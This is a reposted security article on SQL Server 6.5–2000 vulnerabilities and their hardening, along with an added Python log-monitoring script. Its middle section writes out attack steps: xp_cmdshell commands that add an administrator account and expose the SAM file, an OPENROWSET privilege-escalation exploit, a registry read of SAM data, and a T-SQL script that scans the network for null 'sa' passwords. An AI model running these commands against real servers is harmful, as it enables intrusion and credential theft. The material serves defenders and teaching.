Some security issues about SQL Server

zhaozj, 2021-02-11

At present there are many ways to break into an NT server, for example through IIS vulnerabilities, but one thing not everyone pays attention to is that a SQL Server database server associated with the NT server is also a frequently used route. See this news report:

Http://www.vnunet.com/news/1110938.

Herbless broke into a number of sites, such as Legoland.co.uk, through their SQL Servers, and from there gained control of the systems. So protecting SQL Server is no small matter. Here I have collected some vulnerabilities for everyone's reference.

------------------------------------------------------------------

Let's first take a look at the network protocol libraries supported by the SQL Server service:

SQL Server network protocol libraries (protocol library / possible vulnerabilities / encrypted?)

Named Pipes (encrypted: no)
  - Communicates over the NT SMB ports (TCP 139, UDP 137 and 138). These can be controlled at the firewall, but if the internal network can reach them freely this is still a small weakness.
  - User name, password and data are transmitted without encryption; anyone can capture them with a sniffer.

IP Sockets (encrypted: no)
  - Port 1433 is open by default, and a port scanner can find it.
  - Traffic can be intercepted with a sniffer.

Multi-Protocol (encrypted: yes)
  - The client must support NT RPCs; different client types may cause problems.
  - Uses random TCP ports by default, but the port can be fixed for firewall port mapping (see KB Q164667).
  - Check whether the encryption option is selected; it is not selected by default.

NWLink (encrypted: no)
  - Data can be intercepted with a sniffer.

AppleTalk (ADSP)
  - Data can be intercepted with a sniffer.

Banyan Vines (encrypted: no)
  - Data can be intercepted with a sniffer.

------------------------------------------------------------------

The general recommendation is: if you can use Named Pipes with integrated (NT) security or Multi-Protocol, use those protocol libraries, and if possible use Multi-Protocol with the encryption option enabled. If you cannot use either, use the IP Sockets protocol, change its default port, and check the system to make sure no sniffer is running. Also consider a web service, an administrative object layer, or COM components in a middle tier, and use a secure channel between the middle tier and SQL Server. There are many third-party products that encrypt this communication.

----------------------------------------------------------------------

Now let's look at SQL Server's security modes and how they work.

The security mode defines how SQL Server authenticates the users who connect to it. Below are the SQL Server 6.5 security modes, with a description of each and the changes made in SQL Server 7.0:

Standard mode
  - SQL Server 6.5: logins are defined in SQL Server and given a password. SQL Server login accounts are separate from Windows NT accounts.
  - SQL Server 7.0: a separate Standard mode no longer exists.

Integrated mode
  - SQL Server 6.5: Security Manager maps NT accounts to SQL Server accounts. Users connect to SQL Server without a separate login and password. Passwords are never sent over the network in plain text. SQL Server can use NT's authentication features, such as account expiration. Requires the Named Pipes or Multi-Protocol library.
  - SQL Server 7.0: this is now "Windows NT Only" mode. It only works on NT systems; Win9x is not supported. NT groups can be used directly, which eases management (note that a BUILTIN group is created on the local system).

Mixed mode
  - SQL Server 6.5: combines the two modes above: an integrated login is used where possible, but it falls back to a standard login when the client cannot establish a trusted NT connection.
  - SQL Server 7.0: becomes "SQL Server and Windows NT" mode. Try to use Windows NT Only mode instead.

Logging in is only the first step. Once logged in, a user must still be granted access to each individual database, which requires an entry for that user in the database's SYSUSERS table. So check whether a "guest" account exists in your database, because it can give people access to your database without your noticing.

For details, please refer to Microsoft's site:

http://www.microsoft.com/technet/sql/technote/secure.asp

----------------------------------------------------------------------

Some security issues in SQL Server:

The "sa" account has an empty password by default, and it is SQL Server's built-in administrative account. With it, an attacker can use the xp_cmdshell extended stored procedure to run operating system commands, for example:

xp_cmdshell 'net user testuser ugothacked /add'

and then:

xp_cmdshell 'net localgroup administrators testuser /add'

With this the attacker has added an administrator to the SQL Server's host. Of course, doing this remotely usually requires port 1433 to be reachable, connecting with an MS SQL client.

You can also use:

xp_cmdshell 'rdisk /s'

so that the repair information, including a SAM backup, is rebuilt in the \WinNT\Repair directory without prompting the user. After the SAM is backed up, the attacker can create a share or connect to an existing one over SMB:

xp_cmdshell 'net share getsam=c:\winnt\repair'

and copy the file through the share, then run it through L0phtCrack. If the SMB ports are firewalled or closed, the attacker can also copy the sam._ file into the web directory for anonymous download through a browser, and if there is no IIS, why not use TFTP :).

OK, through this controlled SQL Server the attacker can go on to find other machines on the internal network to widen the compromise. Below is a SQL script that lists other SQL Servers on the network with an empty 'sa' password:

----------------------------------------------------------------------

-- Create temp table to store enumerated servers
set nocount on
create table #temp (shelldump varchar(255))
insert #temp exec xp_cmdshell 'osql -L'
declare @current_server varchar(255), @conn_string varchar(255)
declare sql_cursor cursor for select * from #temp
open sql_cursor
fetch next from sql_cursor into @current_server

-- Loop through potential targets and check for null sa accounts
-- If target is vulnerable, version information will be displayed
while @@fetch_status = 0
begin
    -- osql -L prints a "Servers:" header line first; skip it
    if @current_server <> 'Servers:'
    begin
        select @current_server = rtrim(ltrim(@current_server))
        select @conn_string = 'exec xp_cmdshell ''osql -S ' + @current_server + ' -Usa -P -Q "select @@version"'''
        print 'Attempting connection to server: ' + @current_server
        execute (@conn_string)
        print '===================================================================='
    end
    fetch next from sql_cursor into @current_server
end

-- Clean up
close sql_cursor
deallocate sql_cursor
drop table #temp

----------------------------------------------------------------------

Of course, some people may have removed the xp_cmdshell extended stored procedure. Then the following can also be used:

xp_regread 'HKEY_LOCAL_MACHINE', 'SECURITY\SAM\Domains\Account', 'F'

If the MSSQLServer service runs under the local system account and SYSKEY is not enabled on the system, this call can return the encrypted password data or the SID from the registry.

----------------------------------------------------------------------

Another vulnerability is the privilege elevation through ad hoc heterogeneous queries; see the following Microsoft description: http://www.microsoft.com/technet/security/bulletin/fq00-014.asp

For the above vulnerability, the following exploit can be used to obtain elevated privileges:

select * from OPENROWSET('SQLOLEDB', 'Trusted_Connection=Yes;Data Source=myserver', 'set fmtonly off execute master..xp_cmdshell "dir c:\"')

This one only runs dir; other commands could be run the same way, as you can imagine.

----------------------------------------------------------------------

And the most recent vulnerability: Extended Stored Procedure Parameter Parsing. Details are at this URL:

Http://www.microsoft.com/technet/security/bulletin/ms00-092.asp.

The main problem is in the srv_paraminfo() API function provided by ODS (Open Data Services). It is used when an extended stored procedure is called, to parse the parameters, such as:

exec <extended_procedure> <param1>, <param2>, ...

To query the directory tree of "C:\WinNT", you can write:

exec xp_dirtree 'C:\WinNT'

But the length of each parameter was not checked, so passing a very long string can overwrite other data on the stack and cause a buffer overflow.

The affected extended stored procedures known so far are as follows:

1. xp_peekqueue (xpqueue.dll)
   xp_printstatements (xprepl.dll)
   Passing a long string as the first parameter overwrites the return address saved by the exception handler.

2. xp_proxiedmetadata (xprepl.dll)
   This procedure takes four parameters. Passing a long string as the second parameter overwrites the return address saved by the exception handler.

3. xp_setsqlsecurity (xpstar.dll)
   This procedure takes four parameters. Passing a long string as the third parameter terminates the entire SQL Server process immediately.

4. xp_displayparamstmt (xprepl.dll)
   xp_enumresultset (xprepl.dll)
   xp_showcolv (xprepl.dll)
   xp_updatecolvbm (xprepl.dll)
   Passing a long string as the first parameter causes an access violation and overwrites the return address saved by the exception handler.

Here is a handy trick: if you want to know which DLL an extended stored procedure is implemented in, you can do this:

select o.name, c.text from dbo.syscomments c, dbo.sysobjects o where c.id = o.id and o.name = 'xp_peekqueue'

This gives you the DLL that implements the extended stored procedure. If Microsoft has no patch yet, you could temporarily rename this DLL file, but some DLLs implement several extended stored procedures and cannot be renamed blindly, or the others stop working. Use the following to find out which extended stored procedures a DLL implements:

select o.name, c.text from dbo.syscomments c, dbo.sysobjects o where c.id = o.id and c.text = 'xpqueue.dll'

Fortunately, Microsoft has released a patch, which you can find below, so there is no need to hunt for the DLLs:

http://support.microsoft.com/support/sql/xp_security.asp

@stake discovered this vulnerability and provides proof-of-concept code, which you can find here:

http://www.atstake.com/research/advisories/2000/sqladv2-poc.c

----------------------------------------------------------------------

OK, SQL Server also has some other, relatively mild, vulnerabilities, such as the one found by ISS: the administrator login ID is stored in the registry with a simple encryption that is easy to recover. For details see: http://xForce.iss.net/alerts/advise45.php3. Everyone can look elsewhere for others.

----------------------------------------------------------------------

Some security recommendations for SQL Server systems:

- Make sure the latest security patches are applied, namely:

  Windows NT 4.0 - Service Pack 6a
  SQL Server 6.5 - Service Pack 5a
  SQL Server 7.0 - Service Pack 2 (plus various hotfixes; check http://www.microsoft.com/download)
  SQL Server 2000 - HotFix S80233i.exe (Intel)

  Of course, everyone must also keep a close eye on Microsoft's security bulletins.

- Do not use port 1433 for IP Sockets; if you use Multi-Protocol, change its port as well.

- Do not embed the 'sa' password in any application, such as VB/Delphi apps or a global.asa file, because "sa" is SQL Server's default login, its permissions are comparable to the Windows NT administrator account, and its password is empty by default.

- Change the passwords of the 'sa' and 'probe' accounts.

- Make sure SQL Server's error log is stored on an NTFS file system.

- If you do not need xp_cmdshell, do not leave the xp_cmdshell extended stored procedure on the server. Enter the following in any ISQL window:

  use master
  sp_dropextendedproc 'xp_cmdshell'

- Drop the OLE Automation stored procedures if they are not needed (some features of Enterprise Manager will then not work); these procedures are:

  sp_OACreate  sp_OADestroy
  sp_OAGetErrorInfo  sp_OAGetProperty
  sp_OAMethod  sp_OASetProperty
  sp_OAStop

- Remove the registry access procedures that are not needed, namely:

  xp_regaddmultistring
  xp_regdeletekey
  xp_regdeletevalue
  xp_regenumvalues
  xp_regread
  xp_regremovemultistring
  xp_regwrite

- Remove other system stored procedures if you think they still pose a threat. Be careful with these: test on a test machine first to make sure your system still works normally. These procedures include:

  sp_bindsession  sp_cursor  sp_cursorclose
  sp_cursorfetch  sp_cursoropen  sp_cursoroption
  sp_getbindtoken  sp_getmbcscharlen  sp_ismbcsleadbyte
  sp_OACreate  sp_OADestroy  sp_OAGetErrorInfo
  sp_OAGetProperty  sp_OAMethod  sp_OASetProperty
  sp_OAStop  sp_replcmds  sp_replcounters
  sp_repldone  sp_replflush  sp_replstatus
  sp_repltrans  sp_sdidebug  xp_availablemedia
  xp_cmdshell  xp_deletemail  xp_dirtree
  xp_dropwebtask  xp_dsninfo  xp_enumdsn
  xp_enumgroups  xp_enumqueuedtasks
  xp_eventlog  xp_findnextmsg  xp_fixeddrives
  xp_getfiledetails  xp_getnetname  xp_grantlogin
  xp_logevent  xp_loginconfig  xp_logininfo
  xp_makewebtask  xp_msver  xp_perfend
  xp_perfmonitor  xp_perfsample  xp_perfstart
  xp_readerrorlog  xp_readmail  xp_revokelogin
  xp_runwebtask  xp_schedulersignal  xp_sendmail
  xp_servicecontrol  xp_snmp_getstate  xp_snmp_raisetrap
  xp_sprintf  xp_sqlinventory  xp_sqlregister
  xp_sqltrace  xp_sscanf  xp_startmail
  xp_stopmail  xp_subdirs  xp_unc_to_drive

- Remove the guest user from the databases.

- Turn off SQL Mail capability to prevent Trojan horses and viruses delivered by mail.

- Set up a scheduled task that runs the following:

  findstr /C:"login failed" \mssql7\log\*.*

  and redirects the output to another file or mails it to the administrator's mailbox.

- Check frequently for accounts with an empty password:

  use master
  select name, password
  from syslogins
  where password is null
  order by name

- Check for stored procedures and extended stored procedures that can be executed without 'sa' permissions (that is, granted to public, uid 0):

  use master
  select sysobjects.name
  from sysobjects, sysprotects
  where sysprotects.uid = 0
    and xtype in ('X', 'P')
    and sysobjects.id = sysprotects.id
  order by name

- Make sure SQL Server's traffic stays on an isolated network segment.
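A monitoring script along the lines of the FINDSTR recommendation above, added here as an example and not part of the original article: it parses SQL Server errorlog lines for "Login failed" entries, counts them per login and per client, and flags any failure for 'sa' as well as repeated failures from one source. The log lines are constructed, and the exact layout and the "[CLIENT: ...]" suffix are assumptions.

```python
import re
from collections import Counter

# Constructed sample errorlog lines (not from a real server). The layout and the
# "[CLIENT: ...]" suffix on failed-login lines are assumptions for this example.
SAMPLE_LOG = """\
2000-11-15 13:07:21.12 server    SQL Server is starting (constructed sample line)
2000-11-15 13:07:30.05 logon     Login failed for user 'sa'. [CLIENT: 10.0.0.7]
2000-11-15 13:07:30.48 logon     Login failed for user 'sa'. [CLIENT: 10.0.0.7]
2000-11-15 13:07:31.01 logon     Login failed for user 'probe'. [CLIENT: 10.0.0.7]
2000-11-15 13:08:02.77 logon     Login failed for user 'webapp'. [CLIENT: 10.0.0.22]
2000-11-15 13:08:10.00 spid8     Using 'xpstar.dll' to execute extended stored procedure 'xp_regread'.
2000-11-15 13:08:12.33 logon     Login failed for user 'sa'. [CLIENT: 10.0.0.7]
"""

# One regex does what FINDSTR /C:"login failed" does, but also pulls out the
# timestamp, the login name and (when present) the client address.
LOGIN_FAILED = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}\.\d{2})\s+logon\s+"
    r"Login failed for user '(?P<user>[^']*)'\.?(?:\s+\[CLIENT: (?P<client>[^\]]+)\])?"
)


def parse_failed_logins(text):
    """Return one dict (ts, user, client or None) per 'Login failed' line."""
    events = []
    for line in text.splitlines():
        m = LOGIN_FAILED.match(line)
        if m:
            events.append(m.groupdict())
    return events


def summarize(events, threshold=3):
    """Count failures per login and per (client, login); any 'sa' failure and
    any source reaching `threshold` failures for one login become alerts."""
    per_user = Counter(e["user"] for e in events)
    per_source = Counter((e["client"], e["user"]) for e in events)
    alerts = []
    if per_user.get("sa"):
        alerts.append("failed logins as 'sa': %d" % per_user["sa"])
    # key=str keeps the sort stable even when client is None (no CLIENT suffix)
    for (client, user), n in sorted(per_source.items(), key=str):
        if n >= threshold:
            alerts.append("%s: %d failures for '%s'" % (client, n, user))
    return {"per_user": dict(per_user), "alerts": alerts}


if __name__ == "__main__":
    for alert in summarize(parse_failed_logins(SAMPLE_LOG))["alerts"]:
        print("ALERT:", alert)
```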

Please credit the original source when reposting: https://www.9cbs.com/read-3808.html
